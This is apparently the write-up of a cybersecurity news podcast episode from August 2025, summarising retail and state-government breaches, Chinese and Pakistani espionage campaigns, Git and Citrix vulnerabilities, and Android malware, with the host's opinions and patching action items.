Good Morning Security Gang!
It’s Tuesday, August 26th, 2025, and welcome back to another loaded CyberHub Podcast episode. I’ve got my double espresso in hand and a packed slate of stories that touch on retail, state governments, China’s cybercrime machine, and mobile malware madness.
Today we’re talking about Auchan’s retail breach in France, cyber incidents impacting Maryland and Nevada state services, Chinese espionage targeting diplomats, a hacker arrested in South Korea for targeting BTS and other celebrities, plus new Git and Citrix vulnerabilities, Android malware flooding Google Play, and more. Let’s dig right in.
“Trends matter in cybersecurity. Once attackers find systemic weaknesses, they’ll keep hammering until the return dries up.” James Azar
🇫🇷 Auchan Retail Breach Exposes 100K+ Loyalty Customers
French retail giant Auchan confirmed a breach exposing data from several hundred thousand loyalty accounts. While no payment or password data was compromised, sensitive details such as full names, titles, addresses, phone numbers, emails, and loyalty card numbers were stolen. In isolation, this might not seem like a “big deal,” but as I said on the show—trends matter. France has now seen Orange, Bouygues Telecom, Air France-KLM, and others hit in recent months, signaling threat actors have found systemic weaknesses in French digital infrastructure.
🚌 Maryland Transit Authority Breach Hits Disabled Services
The Maryland Transit Authority reported a cyberattack impacting systems used for disabled transportation scheduling. While core transit remains online, the MobilityLink service—vital for people unable to reach bus stops—is down. This disruption highlights the real-world consequences of cyber incidents on vulnerable communities. The state activated its emergency operations center, though no group has claimed responsibility.
🎰 Nevada State Government Incident Takes Offices Offline
Nevada announced a statewide cyber incident affecting multiple agency systems. Some in-person services were suspended, and phone lines tied to VoIP systems went dark. Emergency services like 911 remain operational. This comes almost two years after MGM’s Las Vegas breach, raising concerns about Nevada’s recurring exposure. As I said—why state agencies don’t maintain landline backups still baffles me.
“If your state services collapse because VoIP went down, you failed resilience planning 101—where’s your landline backup?” James Azar
🇨🇳 Chinese Espionage Campaign Targets Diplomats
Google TAG identified Chinese APT UNC6384 using adversary-in-the-middle (AitM) captive portals to target diplomats across Southeast Asia. Attackers mimicked VPN login pages or software updates to deliver signed malware loaders, ultimately deploying PlugX backdoors. This campaign highlights Beijing’s long-running playbook: compromising diplomats to steal insights, blackmail material, and long-term geopolitical leverage.
"China's the head, not Russia, not Iran, not anywhere else. It all starts and ends in China. And if we really want to fight cybercrime and put a dent in it, then President Trump needs to get even tougher on China." James Azar
🎤 Cyber Criminal Arrested in South Korea for Targeting BTS & Executives
South Korea arrested a 34-year-old Chinese national accused of hacking telecom systems and stealing celebrity and executive data, including attempts against BTS singer Jungkook. The hacker siphoned $28.9M in assets by opening bank and crypto accounts under victims’ names. He was extradited from Thailand and admitted to some charges. This arrest underscores how China-backed cybercrime overlaps with financial fraud, fueling a global underground economy.
🛠 Git Vulnerability Exploited in the Wild
A recent Git flaw (CVE-2025-48384) is now under active exploitation. Attackers can manipulate submodule paths to force Git into writing files to unexpected locations. Proof-of-concept exploits are live, and while Windows is unaffected, MacOS and Linux users must patch immediately.
⚡ Pakistani APT Targets Indian Defense via Linux Malware
APT-36 (aka Mythic Leopard) launched a phishing campaign against Indian defense and government entities, leveraging Linux .desktop files as droppers. Malware was delivered via Google Drive and included persistence, anti-debugging, and C2 over WebSockets. This highlights Pakistan’s evolving cyber toolkit—Linux-tailored malware now features in state-sponsored espionage.
📱 Android Malware Floods Google Play – 19M Installs
Zscaler researchers uncovered 77 malicious apps with 19 million installs on Google Play, spreading Joker, Anatsa, and T-Bot trojans. Many posed as utilities or adware, exfiltrating SMS, banking data, and MFA tokens. Google pulled the apps, but this once again proves their security controls lag behind Apple’s walled garden model.
🔒 Citrix Vulnerabilities Added to CISA KEV Catalog
Two critical Citrix flaws—CVE-2024-8068 and CVE-2024-8069—in Session Recording allow privilege escalation and data deserialization exploits. Combined with the Git flaw, these were just added to CISA’s Known Exploited Vulnerability catalog. Federal agencies must patch by mandate, and enterprises should treat these as urgent priorities.
⚖ Senator Wyden Grandstands Over Judiciary Breach
Senator Ron Wyden is again holding up the confirmation of CISA’s new director, demanding more disclosure about federal judiciary breaches, and telecom breaches. I said it on the show—grandstanding doesn’t fix breaches. What would help? Passing federal data privacy and breach notification laws. Until then, we’re patching with politics instead of policy.
🧠 James Azar’s CISO Take
Today’s stories are a reminder that resilience and geopolitics now dominate cybersecurity. From Maryland’s disability transit outage to Nevada’s phone line collapse, basic continuity planning often gets ignored. Meanwhile, China’s campaigns against diplomats and hackers siphoning millions in South Korea show how espionage and crime are converging.
The other theme is maturity in patching and policy. Git, Citrix, Android—vulnerabilities don’t stop, but exploit timelines are shrinking. Federal KEV enforcement helps, but enterprises need to adopt the same urgency. And on the policy side, it’s time for the U.S. to stop posturing and pass consistent data privacy and breach notification standards. Until then, CISOs are left explaining why trends matter—to boards, to regulators, and to customers—while adversaries exploit the gaps.
✅ Action Items
🔐 Patch Git (CVE-2025-48384) on MacOS/Linux systems immediately.
🛡 Update Citrix Session Recording to mitigate CVE-2024-8068/8069.
📲 Audit mobile device policies—block unauthorized app installs.
🚌 Build continuity plans for critical citizen-facing services (landlines as VoIP backups).
🌐 Track APT-36 Linux malware targeting defense orgs.
📡 Monitor Chinese PlugX and captive portal TTPs in diplomatic/enterprise networks.
📜 Push for federal breach notification and privacy laws to reduce patchwork compliance.
That's our show for today, security gang. We'll be back tomorrow at 9 AM Eastern live with all the latest cybersecurity news. Make sure to subscribe, follow, share, like, and comment.
Stay cyber safe, and remember - we love feedback!
Share this post